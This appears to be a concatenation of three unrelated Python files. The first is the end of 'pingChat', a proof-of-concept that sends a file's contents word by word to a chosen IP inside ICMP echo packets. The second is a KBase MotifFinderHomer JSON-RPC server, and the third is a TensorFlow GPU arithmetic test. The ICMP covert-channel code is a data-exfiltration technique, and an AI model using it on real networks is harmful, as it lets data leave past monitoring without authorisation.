        except OSError as e:
            print ("Failure to Send ICMP Packet %s" % str(e))
            return 0
        except:
            return 0
        # Increment the sequence number of the packet...
        seqNumber += 1
    s.close()
    return sentTime
def sendPing(destIP, destFile):
    """Send the contents of destFile to destIP word-by-word over ICMP.

    destFile is a path to a text file whose space-separated words are sent
    as individual messages; the sentinel string '99zz' is sent literally to
    tell the listener to stop.  Returns the timestamp of the last packet
    sent, or 0 if nothing was sent (e.g. empty file) or a send failed.
    """
    sentTime = 0  # fix: avoids UnboundLocalError when the file has no words
    if destFile == '99zz':
        sentTime = sendMessage(destIP, destFile)
    else:
        with open(destFile) as f:
            for line in f:
                for word in line.split(" "):
                    sentTime = sendMessage(destIP, word)
    return sentTime
def main():
    # Interactive loop: prompt the user to type messages that are exfiltrated
    # to a destination IP via ICMP echo requests.
    # NOTE: this function uses Python 2 syntax (print statements, raw_input)
    # and will not run under Python 3.
    print
    print "pingChat was built as a proof-of-concept to demonstrate how to"
    print "exfil information using the ICMP protocol."
    print
    print "Remember to modify the listeningIP at the beginning of the file..."
    print
    #t = threading.Thread(target=listenPing)
    #t.start()
    exitLoop = False
    while exitLoop == False:
        # Listen for incoming icmp messages until a message is crafted to be sent...
        print "\n"
        selection = raw_input("Press S at any time to Send a listeningIPMessage, Q to Quit\n")
        if selection == 'S' or selection == 's':
            destIP = raw_input("Destination IP: ")
            destMessage = raw_input("Message to Send: ")
            sentTime = sendPing(destIP, destMessage)
            if sentTime == 0:
                print "Failed to send the message. Verify the IP is correct."
            else:
                print "Message Sent Successfully @ " + str(sentTime)
        elif selection == 'Q' or selection == 'q':
            # NOTE(review): destIP is only bound after an 'S' selection, so
            # pressing 'Q' first raises NameError here -- confirm intent.
            sendPing(destIP,'99zz')
            #sendPing(listeningIP, '99zz')
            sys.exit(0)
        else:
            pass
# Script entry point: run the interactive send loop.
if __name__ == '__main__':
    main()
|
MotifFinderHomerServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from MotifFinderHomer.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
# Environment variable holding the path of the deployment config file.
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
# Environment variable overriding the service (config section) name.
SERVICE = 'KB_SERVICE_NAME'
# Config key holding the auth service URL.
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
    """Return the deployment config file path from the environment, or None."""
    config_path = environ.get(DEPLOY)
    return config_path
def get_service_name():
    """Return the configured service name from the environment, or None."""
    service_name = environ.get(SERVICE)
    return service_name
def get_config():
    """Parse the deployment config file into a plain dict.

    Returns None when no config file is configured in the environment.
    Reads the section named by the SERVICE env var, falling back to
    'MotifFinderHomer'.
    """
    cfg_path = get_config_file()
    if not cfg_path:
        return None
    parser = ConfigParser()
    parser.read(cfg_path)
    section = get_service_name() or 'MotifFinderHomer'
    return {name: value for name, value in parser.items(section)}
# Load the deployment configuration once at import time; the Impl class
# below is constructed with it (import is deferred until config exists).
config = get_config()

from MotifFinderHomer.MotifFinderHomerImpl import MotifFinderHomer  # noqa @IgnorePep8
impl_MotifFinderHomer = MotifFinderHomer(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that also serializes sets, frozensets, and any object
    exposing a toJSONable() method."""

    def default(self, obj):
        # Sets of either flavor serialize as JSON arrays.
        if isinstance(obj, (set, frozenset)):
            return list(obj)
        # Objects can opt in to serialization via toJSONable().
        to_jsonable = getattr(obj, 'toJSONable', None)
        if to_jsonable is not None:
            return to_jsonable()
        return super(JSONObjectEncoder, self).default(obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSONRPCService subclass that threads a per-call context object (ctx)
    through to the registered service methods and wraps unexpected
    exceptions in JSONServerError with a captured traceback."""

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.

        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)
        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value.

        ctx is always passed as the first positional argument, so the
        arity checks below subtract 1 from the method's declared args.
        """
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')
                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.  (jsonrpcbase stores versions as ints * 10,
                # so 11 means "1.1".)
                if request['jsonrpc'] < 11:
                    raise KeywordError
                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.  Wrap it so the client
            # receives a server error carrying the traceback.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if len(e.args) == 1:
                newerr.data = repr(e.args[0])
            else:
                newerr.data = repr(e.args)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.

        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        # try:
        #     rdata = json.loads(jsondata)
        # except ValueError:
        #     raise ParseError
        # set some default values for error handling
        request = self._get_default_vals()
        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)
            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch: fill all requests first, then dispatch them.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)
            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)
            if responds:
                return responds
            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        # Optional per-method parameter type validation, configured via
        # the 'types' kwarg passed to rpc_service.add().
        if 'types' in self.method_data[request['method']]:
            self._validate_params_types(request['method'], request['params'])
        result = self._call_method(ctx, request)
        # Do not respond to notifications.
        if request['id'] is None:
            return None
        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']
        return respond
class MethodContext(dict):
    """Per-request call context (client, auth, provenance) that also proxies
    log calls to the service logger.  Stored as a plain dict so it can be
    passed straight to Impl methods."""

    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Levels accepted verbatim by log_debug; numeric levels 1-3 are
        # mapped onto 7-9 below.
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        """Log *message* at error level."""
        self._log(log.ERR, message)

    def log_info(self, message):
        """Log *message* at info level."""
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        """Log a debug message; *level* may be 1-3 or a named debug level."""
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            # Map numeric debug levels 1-3 onto logger levels 7-9.
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        # Forward to the biokbase logger along with the call metadata.
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        """Return provenance for this call.

        Prefers the callback server (when SDK_CALLBACK_URL is set in the
        environment) over the locally recorded 'provenance' entry.
        Raises ServerError when the callback server reports a failure.
        """
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                # A 500 with a JSON body carries a structured JSON-RPC error.
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        # Fix: the original called super(Exception, self).__init__, which
        # skips Exception itself in the MRO; initialize this class's own
        # superclass chain instead.
        super(ServerError, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message if message else ''
        # data = JSON RPC 2.0, error = 1.1
        self.data = data or error or ''

    def __str__(self):
        # "<name>: <code>. <message>\n<stacktrace>"
        return self.name + ': ' + str(self.code) + '. ' + self.message + \
            '\n' + self.data
def getIPAddress(environ):
    """Best-effort client IP from the WSGI environ.

    Prefers X-Forwarded-For (first hop), then X-Real-IP, then REMOTE_ADDR.
    Proxy headers are ignored when the config sets
    dont_trust_x_ip_headers to 'true'.
    """
    trust_x_headers = config is None or \
        config.get('dont_trust_x_ip_headers') != 'true'
    if trust_x_headers:
        forwarded = environ.get('HTTP_X_FORWARDED_FOR')
        if forwarded:
            return forwarded.split(',')[0].strip()
        real_ip = environ.get('HTTP_X_REAL_IP')
        if real_ip:
            return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over

    def logcallback(self):
        # Keep the server log pointed at the (possibly rotated) user log file.
        self.serverlog.set_log_file(self.userlog.get_log_file())

    def log(self, level, context, message):
        # Log with the per-request metadata carried in the MethodContext.
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])

    def __init__(self):
        """Set up logging, register all service methods with the JSON-RPC
        dispatcher, record their auth requirements, and create the auth
        client."""
        submod = get_service_name() or 'MotifFinderHomer'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        # Map of method name -> auth requirement ('required'/'optional'/'none').
        self.method_authentication = dict()
        self.rpc_service.add(impl_MotifFinderHomer.find_motifs,
                             name='MotifFinderHomer.find_motifs',
                             types=[dict])
        self.method_authentication['MotifFinderHomer.find_motifs'] = 'required' # noqa
        self.rpc_service.add(impl_MotifFinderHomer.BuildFastaFromSequenceSet,
                             name='MotifFinderHomer.BuildFastaFromSequenceSet',
                             types=[dict])
        self.method_authentication['MotifFinderHomer.BuildFastaFromSequenceSet'] = 'required' # noqa
        self.rpc_service.add(impl_MotifFinderHomer.ExtractPromotersFromFeatureSetandDiscoverMotifs,
                             name='MotifFinderHomer.ExtractPromotersFromFeatureSetandDiscoverMotifs',
                             types=[dict])
        self.method_authentication['MotifFinderHomer.ExtractPromotersFromFeatureSetandDiscoverMotifs'] = 'required' # noqa
        self.rpc_service.add(impl_MotifFinderHomer.DiscoverMotifsFromFasta,
                             name='MotifFinderHomer.DiscoverMotifsFromFasta',
                             types=[dict])
        self.method_authentication['MotifFinderHomer.DiscoverMotifsFromFasta'] = 'required' # noqa
        self.rpc_service.add(impl_MotifFinderHomer.DiscoverMotifsFromSequenceSet,
                             name='MotifFinderHomer.DiscoverMotifsFromSequenceSet',
                             types=[dict])
        self.method_authentication['MotifFinderHomer.DiscoverMotifsFromSequenceSet'] = 'required' # noqa
        # status is registered without an auth requirement (defaults to 'none').
        self.rpc_service.add(impl_MotifFinderHomer.status,
                             name='MotifFinderHomer.status',
                             types=[dict])
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)

    def __call__(self, environ, start_response):
        """WSGI entry point: parse the JSON-RPC request, enforce per-method
        authentication, dispatch it, and return the JSON response."""
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        status = '500 Internal Server Error'

        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                # Record call metadata and provenance before dispatching.
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
                                'Authentication required for ' +
                                'MotifFinderHomer ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception as e:
                                # Optional-auth methods tolerate a bad token;
                                # required-auth methods fail the call.
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())
        # print('Request method was %s\n' % environ['REQUEST_METHOD'])
        # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
        # print('Request body was: %s' % request_body)
        # print('Result from the method call is:\n%s\n' % \
        #    pprint.pformat(rpc_result))

        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''

        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body.encode('utf8')]

    def process_error(self, error, context, request, trace=None):
        """Log *trace* (if any), shape *error* to match the request's
        JSON-RPC version, and return it serialized as a JSON string."""
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])
        if 'id' in request:
            error['id'] = request['id']
        if 'version' in request:
            # JSON-RPC 1.1-style request.
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            # JSON-RPC 2.0-style request.
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            # Neither marker present: fall back to 1.0.
            error['version'] = '1.0'
            error['error']['error'] = trace
        return json.dumps(error)

    def now_in_utc(self):
        """Return the current local time in ISO format with a UTC offset."""
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        # Round the offset to the nearest minute (hence the +30 seconds).
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
# The WSGI application object served by uwsgi or the simple server below.
application = Application()

# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
#    uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
    # Before we do anything with the application, see if the
    # configs specify patching all std routines to be asynch
    # *ONLY* use this if you are going to wrap the service in
    # a wsgi container that has enabled gevent, such as
    # uwsgi with the --gevent option
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print("Monkeypatching std libraries for async")
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass

# Handle to the child server process started by start_server(newprocess=True).
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''Start the JSON-RPC server.

    By default the server runs on localhost on a system-assigned port in
    the main thread, and this call blocks in the serve loop until
    interrupted.  Pass newprocess=True to run the server in a child
    process instead; that allows stop_server() to be called later and
    makes the assigned port number usable as the return value.'''
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    port = httpd.server_address[1]
    print("Listening on port %s" % port)
    if not newprocess:
        # Blocks until interrupted.
        httpd.serve_forever()
    else:
        _proc = Process(target=httpd.serve_forever)
        _proc.daemon = True
        _proc.start()
    return port
def stop_server():
    """Terminate the server child process started by
    start_server(..., newprocess=True)."""
    global _proc
    if _proc is None:
        # Fix: previously this raised AttributeError on NoneType; fail
        # with a clear message instead.
        raise RuntimeError('server is not running')
    _proc.terminate()
    _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Run a single JSON-RPC request from a file and write the response.

    Used for async-job execution: reads the request from input_file_path,
    invokes the service method (authenticating with *token* when given),
    and writes the (possibly error) response to output_file_path.
    Returns 0 on success, 500 when the response carries an error.
    """
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    # Fill in defaults expected by the JSON-RPC machinery.
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    # Mark this as a CLI invocation and record provenance.
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    if 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # Async-job CLI mode: <input.json> <output.json> [token-or-token-file]
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            # The third argument may be a token file or the token itself.
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    # Server mode: optional --port/--host flags.
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print("Host set to %s" % host)
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
#    print("Listening on port %s" % port)
#    httpd = make_server( host, port, application)
#
#    httpd.serve_forever()
|
basic_gpu_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for basic component wise operations using a GPU device."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.gen_array_ops import broadcast_gradient_args
from tensorflow.python.platform import test
class GPUBinaryOpsTest(test.TestCase):
  """Checks elementwise binary ops produce matching results on GPU and CPU."""

  def _compareGPU(self, x, y, np_func, tf_func):
    """Evaluate tf_func(x, y) on GPU and on CPU and assert the results agree.

    np_func is unused here; it is kept for signature parity with sibling
    comparison helpers.
    """
    def _evaluate(use_gpu):
      with self.cached_session(use_gpu=use_gpu):
        lhs = ops.convert_to_tensor(x)
        rhs = ops.convert_to_tensor(y)
        return self.evaluate(tf_func(lhs, rhs))

    # GPU first, CPU second -- same order as the historical test.
    gpu_result = _evaluate(True)
    cpu_result = _evaluate(False)
    self.assertAllClose(cpu_result, gpu_result)

  def _runCommonOps(self, x, y):
    """Exercise add/sub/mul/truediv, shared by every test case below."""
    self._compareGPU(x, y, np.add, math_ops.add)
    self._compareGPU(x, y, np.subtract, math_ops.subtract)
    self._compareGPU(x, y, np.multiply, math_ops.multiply)
    self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)

  def testFloatBasic(self):
    x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float32)
    y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float32)
    self._runCommonOps(x, y)
    self._compareGPU(x, y + 0.1, np.floor_divide, math_ops.floordiv)
    self._compareGPU(x, y, np.power, math_ops.pow)

  def testFloatWithBCast(self):
    # (3, 5) broadcast against (2, 3, 5).
    x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float32)
    y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float32)
    self._runCommonOps(x, y)

  def testDoubleBasic(self):
    x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float64)
    y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float64)
    self._runCommonOps(x, y)

  def testDoubleWithBCast(self):
    # (3, 5) broadcast against (2, 3, 5).
    x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float64)
    y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float64)
    self._runCommonOps(x, y)
class MathBuiltinUnaryTest(test.TestCase):
  """Compares TF unary math ops against their NumPy references."""

  def _compare(self, x, np_func, tf_func, use_gpu):
    expected = np_func(x)
    with self.cached_session(use_gpu=use_gpu):
      actual = self.evaluate(tf_func(ops.convert_to_tensor(x)))
    self.assertAllClose(expected, actual)

  def _inv(self, x):
    return 1.0 / x

  def _rsqrt(self, x):
    # Reference implementation: 1 / sqrt(x).
    return self._inv(np.sqrt(x))

  def _testDtype(self, dtype, use_gpu):
    data = (np.arange(-3, 3) / 4.).reshape([1, 3, 2]).astype(dtype)
    data_gt_1 = data + 2  # for x > 1
    # (input, numpy reference, tf op); order matches the historical test.
    cases = [
        (data, np.abs, math_ops.abs),
        (data, np.arccos, math_ops.acos),
        (data, np.arcsin, math_ops.asin),
        (data, np.arcsinh, math_ops.asinh),
        (data_gt_1, np.arccosh, math_ops.acosh),
        (data, np.arctan, math_ops.atan),
        (data, np.ceil, math_ops.ceil),
        (data, np.cos, math_ops.cos),
        (data, np.cosh, math_ops.cosh),
        (data, np.exp, math_ops.exp),
        (data, np.floor, math_ops.floor),
        (data, np.log, math_ops.log),
        (data, np.log1p, math_ops.log1p),
        (data, np.negative, math_ops.negative),
        (data, self._rsqrt, math_ops.rsqrt),
        (data, np.sin, math_ops.sin),
        (data, np.sinh, math_ops.sinh),
        (data, np.sqrt, math_ops.sqrt),
        (data, np.square, math_ops.square),
        (data, np.tan, math_ops.tan),
        (data, np.tanh, math_ops.tanh),
        (data, np.arctanh, math_ops.atanh),
    ]
    for arg, np_func, tf_func in cases:
      self._compare(arg, np_func, tf_func, use_gpu)

  def testTypes(self):
    for dtype in (np.float32,):
      self._testDtype(dtype, use_gpu=True)

  def testFloorDivide(self):
    shape = [1, 3, 2]
    x = (1 + np.linspace(0, 5, np.prod(shape))).astype(np.float32).reshape(shape)
    y = (1 + np.linspace(0, 5, np.prod(shape))).astype(np.float32).reshape(shape)
    expected = np.floor_divide(x, y + 0.1)
    with self.session(use_gpu=True):
      # floordiv expressed as floor(truediv) to exercise both kernels.
      quotient = ops.convert_to_tensor(x) / ops.convert_to_tensor(y + 0.1)
      actual = self.evaluate(math_ops.floor(quotient))
    self.assertAllClose(expected, actual)
class BroadcastSimpleTest(test.TestCase):
  """Gradient and GPU checks for broadcasting division ops."""

  def _GetGradientArgs(self, xs, ys):
    # Returns the reduction indices produced by broadcast_gradient_args
    # for the two shapes.
    with self.cached_session(use_gpu=True) as sess:
      return sess.run(broadcast_gradient_args(xs, ys))

  @test_util.run_deprecated_v1
  def testBroadcast(self):
    r0, r1 = self._GetGradientArgs([2, 3, 5], [1])
    self.assertAllEqual(r0, [])
    self.assertAllEqual(r1, [0, 1, 2])

  # Per-dtype tolerance for numeric-vs-symbolic gradient comparison.
  _GRAD_TOL = {dtypes.float32: 1e-3}

  def _compareGradientX(self,
                        x,
                        y,
                        np_func,
                        tf_func,
                        numeric_gradient_type=None):
    # Checks the gradient of tf_func(x, y) with respect to x against a
    # numerically computed gradient.
    z = np_func(x, y)
    zs = list(z.shape)
    with self.cached_session():
      inx = ops.convert_to_tensor(x)
      iny = ops.convert_to_tensor(y)
      # Scaling by 1.1 avoids a trivially-identity gradient for float types.
      if x.dtype in (np.float32, np.float64):
        out = 1.1 * tf_func(inx, iny)
      else:
        out = tf_func(inx, iny)
      xs = list(x.shape)
      jacob_t, jacob_n = gradient_checker.compute_gradient(
          inx, xs, out, zs, x_init_value=x)
      tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
      self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)

  def _compareGradientY(self,
                        x,
                        y,
                        np_func,
                        tf_func,
                        numeric_gradient_type=None):
    # Same as _compareGradientX, but differentiates with respect to y.
    z = np_func(x, y)
    zs = list(z.shape)
    with self.cached_session():
      inx = ops.convert_to_tensor(x)
      iny = ops.convert_to_tensor(y)
      if x.dtype in (np.float32, np.float64):
        out = 1.1 * tf_func(inx, iny)
      else:
        out = tf_func(inx, iny)
      ys = list(np.shape(y))
      jacob_t, jacob_n = gradient_checker.compute_gradient(
          iny, ys, out, zs, x_init_value=y)
      tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
      self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)

  def _compareGpu(self, x, y, np_func, tf_func):
    # Forward-pass check: GPU result must match the NumPy reference.
    np_ans = np_func(x, y)
    with self.cached_session(use_gpu=True):
      inx = ops.convert_to_tensor(x)
      iny = ops.convert_to_tensor(y)
      out = tf_func(inx, iny)
      tf_gpu = self.evaluate(out)
    self.assertAllClose(np_ans, tf_gpu)
    self.assertShapeEqual(np_ans, out)
